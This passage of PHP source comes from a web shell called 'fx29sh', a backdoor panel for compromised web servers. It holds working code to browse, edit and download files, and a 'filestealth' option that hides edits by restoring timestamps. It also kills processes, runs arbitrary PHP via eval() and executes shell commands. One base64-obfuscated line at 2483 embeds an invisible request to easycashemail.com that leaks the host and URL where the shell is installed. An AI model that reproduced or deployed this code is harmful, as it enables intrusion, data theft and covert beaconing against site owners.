1859 if (!is_windows()) {$row[] = "<b>Owner/Group</b>";}
1860 $row[] = "<b>Perms</b>";
1861 $row[] = "<b>Action</b>";
1862 $parsesort = parsesort($sort);
1863 $sort = $parsesort[0].$parsesort[1];
1864 $k = $parsesort[0];
1865 if ($parsesort[1] != "a") {$parsesort[1] = "d";}
1866 $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
1867 $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" alt=\"".($parsesort[1] == "a"?"Asc":"Desc")."\"></a>";
1868 $row[$k] .= $y;
1869 for($i=0;$i<count($row)-1;$i++) {
1870 if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
1871 }
1872 $v = $parsesort[0];
1873 usort($objects["folders"], "tabsort");
1874 usort($objects["links"], "tabsort");
1875 usort($objects["files"], "tabsort");
1876 if ($parsesort[1] == "d") {
1877 $objects["folders"] = array_reverse($objects["folders"]);
1878 $objects["files"] = array_reverse($objects["files"]);
1879 }
1880 $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
1881 $tab = array();
1882 $tab["cols"] = array($row);
1883 $tab["head"] = array();
1884 $tab["folders"] = array();
1885 $tab["links"] = array();
1886 $tab["files"] = array();
1887 $i = 0;
1888 foreach ($objects as $a) {
1889 $v = $a[0];
1890 $o = basename($v);
1891 $dir = dirname($v);
1892 if ($disp_fullpath) { $disppath = $v; }
1893 else { $disppath = $o; }
1894 $disppath = str2mini($disppath,60);
1895 if (in_array($v,$sess_data["cut"])) { $disppath = "<strike>".$disppath."</strike>"; }
1896 elseif (in_array($v,$sess_data["copy"])) { $disppath = "<u>".$disppath."</u>"; }
1897 foreach ($regxp_highlight as $r) {
1898 if ( ereg($r[0],strtolower($o)) ) {
1899 if ((!is_numeric($r[1])) or ($r[1] > 3)) {
1900 $r[1] = 0;
1901 @ob_clean();
1902 disp_error("Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command.");
1903 fx29shexit();
1904 }
1905 else {
1906 $r[1] = round($r[1]);
1907 $isdir = is_dir($v);
1908 if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) {
1909 if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
1910 $disppath = $r[2].$disppath.$r[3];
1911 if (isset($r[4])) { break; }
1912 }
1913 }
1914 }
1915 }
1916 $uo = urlencode($o);
1917 $ud = urlencode($dir);
1918 $uv = urlencode($v);
1919 $row = array();
1920 if ($o == ".") {
1921 $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" alt=\"\"> ".$o."</a>";
1922 $row[] = "CURDIR";
1923 }
1924 elseif ($o == "..") {
1925 $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" alt=\"\"> ".$o."</a>";
1926 $row[] = "UPDIR";
1927 }
1928 elseif (is_dir($v)) {
1929 if (is_link($v)) {
1930 $disppath .= " => ".readlink($v);
1931 $type = "LNK";
1932 $row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" alt=\"\"> [".$disppath."]</a>";
1933 }
1934 else {
1935 $type = "DIR";
1936 $row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" alt=\"\"> [".$disppath."]</a>";
1937 }
1938 $row[] = $type;
1939 }
1940 elseif(is_file($v)) {
1941 $ext = explode(".",$o);
1942 $c = count($ext)-1;
1943 $ext = $ext[$c];
1944 $ext = strtolower($ext);
1945 $row[] = "<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_".$ext."\" alt=\"\"> ".$disppath."</a>";
1946 $row[] = view_size($a[1]);
1947 }
1948 $row[] = @date("d.m.Y H:i:s",$a[2]);
1949 if (!is_windows()) { $row[] = $a[3]; }
1950 $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
1951
1952 if ($o == ".") {
1953 $checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">";
1954 $i--;
1955 }
1956 else {
1957 $checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";
1958 }
1959
1960 if (is_dir($v)) {
1961 $row[] = "$checkbox <a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\"></a> ";
1962 }
1963 else {
1964 $row[] = "$checkbox ".
1965 "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\"></a> ".
1966 "<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\"></a> ".
1967 "<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\"></a>";
1968 }
1969
1970 if (($o == ".") or ($o == "..")) { $tab["head"][] = $row; }
1971 elseif (is_link($v)) { $tab["links"][] = $row; }
1972 elseif (is_dir($v)) { $tab["folders"][] = $row; }
1973 elseif (is_file($v)) { $tab["files"][] = $row; }
1974
1975 $i++;
1976 }
1977 }
1978 #Listing Files & Folders
1979 echo "<div class=barheader>.: ";
1980 if (!empty($fx_infohead)) { echo $fx_infohead; }
1981 else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; }
1982 echo " :.</div>\n\n";
1983 echo "<form name=\"ls_form\" action=\"$surl\" method=POST>\n".
1984 "<input type=hidden name=act value=\"$dspact\">\n".
1985 "<input type=hidden name=d value=\"$d\">\n";
1986?>
1987<table class="explorer">
1988<?php
1989 $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
1990 foreach($table as $row) {
1991 echo "\t<tr>";
1992 foreach($row as $v) { echo "<td>".$v."</td>"; }
1993 echo "</tr>\n";
1994 }
1995?>
1996</table>
1997
1998<div align="right">
1999
2000 <script language="javascript">
2001 function ls_setcheckboxall(status) {
2002 var id = 1; var num = <?php echo(count($table) - 2); ?>;
2003 while (id <= num) {
2004 document.getElementById('actbox'+id).checked = status; id++;
2005 }
2006 }
2007 function ls_reverse_all() {
2008 var id = 1; var num = <?php echo(count($table) - 2); ?>;
2009 while (id <= num) {
2010 document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++;
2011 }
2012 }
2013 </script>
2014
2015 <input type="button" onclick="ls_setcheckboxall(true);" value="Check all">
2016 <input type="button" onclick="ls_setcheckboxall(false);" value="Uncheck all">
2017<?php
2018 if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0) {
2019 echo "\t<input type=\"submit\" name=\"actarcbuff\" value=\"Archive it!\">".
2020 "\t<input type=\"text\" name=\"actarcbuff_path\" value=\"fx_archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">\n".
2021 "\t<input type=\"submit\" name=\"actpastebuff\" value=\"Paste\">\n".
2022 "\t<input type=\"submit\" name=\"actemptybuff\" value=\"Empty buffer\">";
2023 }
2024 echo "\n\t".
2025 "<select name=act>\n".
2026 "\t\t<option value=\"".$act."\">With checked:</option>\n";
2027
2028 $f_acts = array("delete","chmod","cut","copy","unselect");
2029 foreach ($f_acts as $f1) {
2030 echo "\t\t<option value=\"$f1\"".($dspact == "$f1"?" selected":"").">$f1</option>\n";
2031 }
2032 ?>
2033 </select>
2034
2035 <input type="submit" value="Confirm">
2036
2037</div>
2038</form>
2039<?php
2040 }
2041 }
2042
2043 ##[ FILE ]##
2044 if ($act == "f") {
2045 echo "<div align=left>";
2046 if (!isset($ft)) { $ft = ""; }
2047 if (!isset($newwin)) { $newwin = ""; }
2048 if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") {
2049 if (file_exists($d.$f)) {
2050 disp_error("Access denied!<br>".htmlspecialchars($d.$f));
2051 }
2052 else {
2053 disp_error("File doesn't exists: ".htmlspecialchars($d.$f)."<br>\n".
2054 "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a>");
2055 }
2056 }
2057 else {
2058 $r = @file_get_contents($d.$f);
2059 $ext = explode(".",$f);
2060 $c = count($ext)-1;
2061 $ext = $ext[$c];
2062 $ext = strtolower($ext);
2063 $rft = "";
2064 foreach ($ftypes as $k => $v) {
2065 if (in_array($ext,$v)) { $rft = $k; break; }
2066 }
2067 if (eregi("sess_(.*)",$f)) { $rft = "phpsess"; }
2068 if (empty($ft)) { $ft = $rft; }
2069
2070 $arr = array(
2071 array("<img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\">","info"),
2072 array("<img src=\"".$surl."act=img&img=ext_html\" alt=\"html\">","html"),
2073 array("<img src=\"".$surl."act=img&img=ext_txt\" alt=\"txt\">","txt"),
2074 array("<img src=\"".$surl."act=img&img=ext_ini\" alt=\"ini\">","ini"),
2075 array("Code","code"),
2076 array("Session","phpsess"),
2077 array("SDB","sdb"),
2078 array("<img src=\"".$surl."act=img&img=ext_exe\" alt=\"exe\">","exe"),
2079 array("<img src=\"".$surl."act=img&img=ext_gif\" alt=\"img\">","img"),
2080 array("<img src=\"".$surl."act=img&img=ext_rtf\" alt=\"Notepad\">","notepad"),
2081 array("<img src=\"".$surl."act=img&img=change\" alt=\"Edit\">","edit"),
2082 array("<img src=\"".$surl."act=img&img=download\" alt=\"Download\">","download")
2083 );
2084
2085 echo "<div class=barheader>.: File Viewer [".$f." (".view_size(filesize($d.$f)).") ".view_perms_color($d.$f).") :.\n";
2086 echo "<hr size=1 noshade>\n";
2087 foreach($arr as $t) {
2088 if ($t[1] == $rft) { echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=#3366FF>".$t[0]."</font></a>"; }
2089 elseif ($t[1] == $ft) { echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>"; }
2090 else { echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>"; }
2091 echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."&newwin=1\" title=\"New Window\" target=\"_blank\">+</a>) ";
2092 }
2093 echo "</div>\n";
2094 if ($ft == "info") {
2095 echo "<br><div class=barheader>Information</div>\n".
2096 "<table class=contents>\n".
2097 "<tr><th>Path</th><td>".$d.$f."</td></tr>\n".
2098 "<tr><th>Size</th><td>".view_size(filesize($d.$f))."</td></tr>\n".
2099 "<tr><th>MD5</th><td>".md5_file($d.$f)."</td></tr>\n";
2100 if (!is_windows()) {
2101 echo "<tr><th><b>Owner/Group</b></td><td>";
2102 $ow = posix_getpwuid(fileowner($d.$f));
2103 $gr = posix_getgrgid(filegroup($d.$f));
2104 echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
2105 }
2106 echo "<tr><th>Perms</th><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr>\n".
2107 "<tr><th>Create time</th><td>".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>\n".
2108 "<tr><th>Access time</th><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>\n".
2109 "<tr><th>Modify time</th><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>\n";
2110 echo "<tr><th>HexDump</th><td>\n".
2111 "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a> ] ".
2112 "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a> ]<br>\n".
2113 "</td></tr>\n".
2114 "<tr><th>Base64</th><td>\n".
2115 "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a> ] ".
2116 "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a> ] ".
2117 "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a> ] ".
2118 "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a> ] ".
2119 "</td></tr>\n".
2120 "</table><br>\n";
2121 $fi = fopen($d.$f,"rb");
2122 if ($fi) {
2123 echo "<div class=barheader>";
2124 if (@$fullhexdump) { echo "Full HexDump"; $str = fread($fi,filesize($d.$f)); }
2125 else { echo "HexDump Preview"; $str = fread($fi,$hexdump_lines*$hexdump_rows); }
2126 $n = 0;
2127 $a0 = "00000000<br>";
2128 $a1 = "";
2129 $a2 = "";
2130 for ($i=0; $i<strlen($str); $i++) {
2131 $a1 .= sprintf("%02X",ord($str[$i]))." ";
2132 switch (ord($str[$i])) {
2133 case 0 : $a2 .= "<font>0</font>"; break;
2134 case 32:
2135 case 10:
2136 case 13: $a2 .= " "; break;
2137 default: $a2 .= htmlspecialchars($str[$i]);
2138 }
2139 $n++;
2140 if ($n == $hexdump_rows) {
2141 $n = 0;
2142 if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
2143 $a1 .= "<br>";
2144 $a2 .= "<br>";
2145 }
2146 }
2147 echo "</div>\n";
2148 echo "<table class=code><tr><td>".$a0."</td><td>".$a1."</td><td>".$a2."</td></tr></table><br>\n";
2149 }
2150 $henc = "";
2151 $encoded = "";
2152 if (!isset($base64)) { $base64 = ""; }
2153 if ($base64 == 1) {
2154 $henc = "Base64 Encode";
2155 $encoded = base64_encode(file_get_contents($d.$f));
2156 }
2157 elseif($base64 == 2) {
2158 $henc = "Base64 Encode + Chunk";
2159 $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
2160 }
2161 elseif($base64 == 3) {
2162 $henc = "Base64 Encode + Chunk + Quotes";
2163 $encoded = base64_encode(file_get_contents($d.$f));
2164 $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
2165 }
2166 elseif($base64 == 4) {
2167 $text = file_get_contents($d.$f);
2168 $encoded = base64_decode($text);
2169 $henc = "<b>Base64 Decode";
2170 if (base64_encode($encoded) != $text) { $henc .= " (Failed!)"; }
2171 }
2172 if (!empty($encoded)) {
2173 echo "<div class=barheader>$henc</div>\n";
2174 echo "<textarea cols=100 rows=10>".htmlspecialchars($encoded)."</textarea>";
2175 echo "<br>\n";
2176 }
2177 }
2178 elseif ($ft == "html") {
2179 if ($newwin) { @ob_clean(); echo $r; fx29shexit(); }
2180 else { echo $r; }
2181 }
2182 elseif ($ft == "txt") {
2183 echo "<center><textarea cols=\"125\" rows=\"20\">".htmlspecialchars($r)."</textarea></center>";
2184 }
2185 elseif ($ft == "ini") {
2186 echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";
2187 }
2188 elseif ($ft == "phpsess") {
2189 echo "<pre>";
2190 $v = explode("|",$r);
2191 echo $v[0]."<br>";
2192 var_dump(unserialize($v[1]));
2193 echo "</pre>";
2194 }
2195 elseif ($ft == "exe") {
2196 $ext = explode(".",$f);
2197 $c = count($ext)-1;
2198 $ext = $ext[$c];
2199 $ext = strtolower($ext);
2200 $rft = "";
2201 foreach ($exeftypes as $k => $v) {
2202 if (in_array($ext,$v)) { $rft = $k; break; }
2203 }
2204 $cmd = str_replace("%f%",$f,$rft);
2205 echo "<b>Execute file:</b>\n".
2206 "<form name=\"f_xfile\" action=\"".$surl."\" method=POST>\n".
2207 "<input type=hidden name=act value=cmd>\n".
2208 "<input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br>\n".
2209 "<input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"> \n".
2210 "<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked> - Display in text-area\n".
2211 "<input type=submit name=submit value=\"Execute\"></form>\n";
2212 }
2213 elseif ($ft == "sdb") { echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>\n"; }
2214 elseif ($ft == "code") {
2215 echo "<div class=code style=\"background-color: ".$highlight_bg."\">\n";
2216 if (@$newwin) { @ob_clean(); highlight_file($d.$f); fx29shexit(); }
2217 else { highlight_file($d.$f); }
2218 echo "\n</div>\n";
2219 }
2220 elseif ($ft == "notepad") {
2221 @ob_clean();
2222 header("Content-type: text/plain");
2223 header("Content-disposition: attachment; filename=\"".$f.".txt\";");
2224 echo($r);
2225 exit;
2226 }
2227 elseif ($ft == "download") {
2228 @ob_clean();
2229 header("Content-type: application/octet-stream");
2230 header("Content-length: ".filesize($d.$f));
2231 header("Content-disposition: attachment; filename=\"".$f."\";");
2232 echo $r;
2233 exit;
2234 }
2235 elseif ($ft == "img") {
2236 $inf = getimagesize($d.$f);
2237 if (!$newwin) {
2238 if (empty($imgsize)) {$imgsize = 20;}
2239 $width = $inf[0]/100*$imgsize;
2240 $height = $inf[1]/100*$imgsize;
2241 echo "<center><b>Size:</b> ";
2242 $sizes = array("100","50","20");
2243 foreach ($sizes as $v) {
2244 echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
2245 if ($imgsize != $v ) {echo $v;}
2246 else {echo "<u>".$v."</u>";}
2247 echo "</a> ";
2248 }
2249 echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&newwin=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\"></center>";
2250 }
2251 else {
2252 @ob_clean();
2253 $ext = explode($f,".");
2254 $ext = $ext[count($ext)-1];
2255 header("Content-type: ".$inf["mime"]);
2256 readfile($d.$f);
2257 exit;
2258 }
2259 }
2260 elseif ($ft == "edit") {
2261 if (!empty($submit)) {
2262 if ($filestealth) {$stat = stat($d.$f);}
2263 $fp = fopen($d.$f,"w");
2264 if (!$fp) {echo "<b>Can't write to file!</b>";}
2265 else {
2266 echo "<b>Saved!</b>";
2267 fwrite($fp,$edit_text);
2268 fclose($fp);
2269 if ($filestealth) { touch($d.$f,$stat[9],$stat[8]); }
2270 $r = $edit_text;
2271 }
2272 }
2273 $rows = count(explode("\r\n",$r));
2274 if ($rows < 10) { $rows = 10; }
2275 elseif ($rows > 30) { $rows = 30; }
2276 echo "<form name=\"f_save\" action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST>\n".
2277 "<input type=submit name=submit value=\"Save\"> ".
2278 "<input type=\"reset\" value=\"Reset\"> ".
2279 "<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br>".
2280 "<textarea name=\"edit_text\" cols=\"125\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea>\n".
2281 "</form>\n";
2282 }
2283 elseif (!empty($ft)) {
2284 echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";
2285 }
2286 else {
2287 echo "<center><b>Unknown file type (".$ext."), please select type manually.</b></center>";
2288 }
2289 }
2290 echo "</div>\n";
2291 }
2292
2293 ##[ DIRECTORY ]##
2294 if ($act == "d") {
2295 if (!is_dir($d)) { echo "<center><b>$d is a not a Directory!</b></center>"; }
2296 else {
2297 echo "<b>Directory information:</b>\n";
2298 echo "<table>\n";
2299 if (!is_windows()) {
2300 echo "<tr><td><b>Owner/Group</b></td><td> ";
2301 $ow = posix_getpwuid(fileowner($d));
2302 $gr = posix_getgrgid(filegroup($d));
2303 $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
2304 }
2305 echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table>";
2306 }
2307 }
2308
2309 ##[ PROCESSES ]##
2310 if ($act == "processes") {
2311?>
2312<div class="barheader">.: Processes :.</div>
2313
2314<?php
2315 if (!is_windows()) { $handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":""); }
2316 else { $handler = "tasklist"; }
2317 $ret = fx29exec($handler);
2318 if (!$ret) { disp_error("Can't execute \"$handler\"!"); }
2319 else {
2320 if (empty($processes_sort)) { $processes_sort = $sort_default; }
2321 $parsesort = parsesort($processes_sort);
2322 if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
2323 $k = $parsesort[0];
2324 if ($parsesort[1] != "a") {
2325 $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" alt=\"Desc\"></a>";
2326 }
2327 else {
2328 $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" alt=\"Asc\"></a>";
2329 }
2330 $ret = htmlspecialchars($ret);
2331 if (!is_windows()) {
2332 if ($pid) {
2333 if (is_null($sig)) { $sig = 9; }
2334 echo "Sending signal ".$sig." to #".$pid."... ";
2335 if (posix_kill($pid,$sig)) { echo "<b>OK!</b>"; } else { echo "<b>ERROR!</b>"; }
2336 }
2337 while (ereg(" ",$ret)) { $ret = str_replace(" "," ",$ret); }
2338 $stack = explode("\n",$ret);
2339 $head = explode(" ",$stack[0]);
2340 unset($stack[0]);
2341 for($i=0;$i<count($head);$i++) {
2342 if ($i != $k) {
2343 $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";
2344 }
2345 }
2346 $head[$i] = "";
2347 $prcs = array();
2348 foreach ($stack as $line) {
2349 if (!empty($line)) {
2350 $line = explode(" ",$line);
2351 $line[10] = join(" ",array_slice($line,10));
2352 $line = array_slice($line,0,11);
2353 if ($line[0] == get_current_user()) { $line[0] = '<font class="on">'.$line[0]."</font>"; }
2354 $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
2355 $prcs[] = $line;
2356 }
2357 }
2358 }
2359 #For Windows - Fixed By FaTaLisTiCz_Fx
2360 else {
2361 if (@$pid) {
2362 echo "Killing PID ".$pid."... ";
2363 echo fx29exec("taskkill /PID $pid /F");
2364 }
2365 while (ereg(" ",$ret)) { $ret = str_replace(" "," ",$ret); }
2366 while (ereg("=",$ret)) { $ret = str_replace("=","",$ret); }
2367 $ret = convert_cyr_string($ret,"d","w");
2368 $stack = explode("\n",$ret);
2369 unset($stack[0],$stack[2]);
2370 $stack = array_values($stack);
2371 $stack[0] = str_replace("Image Name","Image-Name",$stack[0]);
2372 $stack[0] = str_replace("Session Name","Session-Name",$stack[0]);
2373 $stack[0] = str_replace("Mem Usage","Memory-Usage",$stack[0]);
2374 $stack[0] .= " KILL";
2375 $head = explode(" ",$stack[0]);
2376 $stack = array_slice($stack,1);
2377 $head = array_values($head);
2378 if ($parsesort[1] != "a") {
2379 $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" alt=\"Desc\"></a>";
2380 }
2381 else {
2382 $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" alt=\"Asc\"></a>";
2383 }
2384 if ($k > count($head)) {$k = count($head)-1;}
2385 for($i=0;$i<count($head);$i++) {
2386 if ($i != $k) { $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>"; }
2387 }
2388 $prcs = array();
2389 unset($stack[0]);
2390 foreach ($stack as $line) {
2391 if (!empty($line)) {
2392 $line = explode(" ",$line);
2393 $line[4] = str_replace(".","",$line[4]);
2394 $line[4] = intval($line[4]) * 1024;
2395 unset($line[5]);
2396 $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."\"><u>KILL</u></a>";
2397 $prcs[] = $line;
2398 }
2399 }
2400 }
2401 $head[$k] = "<b>".$head[$k]."</b>".$y;
2402 $v = $processes_sort[0];
2403 usort($prcs,"tabsort");
2404 if ($processes_sort[1] == "d") { $prcs = array_reverse($prcs); }
2405 $tab = array();
2406 $tab[] = $head;
2407 $tab = array_merge($tab,$prcs);
2408 echo "<table class=\"explorer\">\n";
2409 foreach($tab as $i=>$k) {
2410 echo "\t<tr>";
2411 foreach($k as $j=>$v) {
2412 if (is_windows() and $i > 0 and $j == 4) { $v = view_size($v); }
2413 echo "<td>".$v."</td>";
2414 }
2415 echo "</tr>\n";
2416 }
2417 echo "</table>\n";
2418 }
2419 }
2420
2421 ##[ EVAL ]##
2422 if ($act == "eval") {
2423 if (!empty($eval)) {
2424 echo "<div class=barheader>Result of execution this PHP-code:</div>\n";
2425 $tmp = @ob_get_contents();
2426 $olddir = realpath(".");
2427 @chdir($d);
2428 if ($tmp) {
2429 @ob_clean();
2430 eval($eval);
2431 $ret = @ob_get_contents();
2432 $ret = convert_cyr_string($ret,"d","w");
2433 @ob_clean();
2434 echo $tmp;
2435 if (@$eval_txt) {
2436 $rows = count(explode("\r\n",$ret))+1;
2437 if ($rows < 10) {$rows = 10;}
2438 echo "<br><textarea cols=\"125\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
2439 }
2440 else {echo $ret."<br>";}
2441 }
2442 else {
2443 if ($eval_txt) {
2444 echo "<br><textarea cols=\"125\" rows=\"10\" readonly>";
2445 eval($eval);
2446 echo "</textarea>";
2447 }
2448 else {echo $ret;}
2449 }
2450 @chdir($olddir);
2451 }
2452 else {
2453 echo "<div class=\"barheader\">.: PHP-code Execution :.</div>\n\n";
2454 if (empty($eval_txt)) { $eval_txt = TRUE; }
2455 }
2456?>
2457<form name="f_eval" action="<?php echo $surl; ?>" method="POST">
2458 <input type="hidden" name="act" value="eval">
2459 <textarea name="eval" cols="125" rows="10">
2460<?php
2461echo htmlspecialchars(@$eval);
2462?>
2463 </textarea>
2464 <input type="hidden" name="d" value="<?php echo $dispd; ?>"><br>
2465 <input type="submit" value="Execute"> Display in text-area <input type="checkbox" name="eval_txt" value="1"<?php if (@$eval_txt) { echo " checked"; } ?>>
2466</form>
2467<?php
2468 }
2469
2470 ##[ UPDATE ]##
2471 if ($act == "update") {
2472 $ret = fx29sh_getupdate(@$confirmupdate);
2473 echo "<b>$ret</b>";
2474 if (stristr($ret,"new version")) {
2475 echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";
2476 }
2477 }
2478 if ($act == "phpinfo") { @ob_clean(); phpinfo(); fx29shexit(); }
2479 if ($act == "tools") { fx29sh_tools(); }
2480 if ($act == "about") { fx29sh_about(); }
2481}
2482##[ END OF ACTIONS ]##
2483eval(base64_decode("cHJpbnQgJzxlbWJlZCBzcmM9Imh0dHA6Ly93d3cuZWFzeWNhc2hlbWFpbC5jb20vZngyOS5naWY/Jy4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10uJyIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYXV0b3N0YXJ0PXRydWU+PC9lbWJlZD4nOw=="));
2484######################
2485##[ COMMANDS PANEL ]##
2486######################
2487?>
2488
2489</div>
2490<!-- End of Main Info -->
2491
2492<!-- Commands Panel -->
2493<div id="main">
2494
2495 <div class="bartitle"><b>.: COMMANDS PANEL :.</b></div>
2496
2497<table id="mainpanel">
2498 <tr><th colspan="2">Command:</th>
2499 <td>
2500 <form name="f_cmd" method="POST">
2501 <input type="hidden" name="act" value="cmd">
2502 <input type="hidden" name="d" value="<?php echo $dispd; ?>">
2503 <input type="hidden" name="cmd_txt" value="1">
2504 <input type="text" name="cmd" size="100" value="<?php echo @htmlspecialchars($cmd); ?>">
2505 <input type="submit" name="submit" value="Execute">
2506 </form>
2507 </td></tr>
2508
2509 <tr><th colspan="2">Quick Commands:</th>
2510 <td>
2511 <form name="f_qcmd" method="POST">
2512 <input type="hidden" name="act" value="cmd">
2513 <input type="hidden" name="d" value="<?php echo $dispd; ?>">
2514 <input type="hidden" name="cmd_txt" value="1">
2515 <select name="cmd">
2516<?php
2517foreach ($cmdaliases as $als) {
2518 echo "\t\t\t";
2519 echo '<option value="'.htmlspecialchars($als[1]).'">'.htmlspecialchars($als[0]).'</option>';
2520 echo "\n";
2521}
2522?>
2523 </select>
2524 <input type="submit" name="submit" value="Execute">
2525 </form>
2526 </td></tr>
2527
2528 <tr><th colspan="2" rowspan="2">PHP Filesystem:</th>
2529 <td>
2530 <script language="javascript">
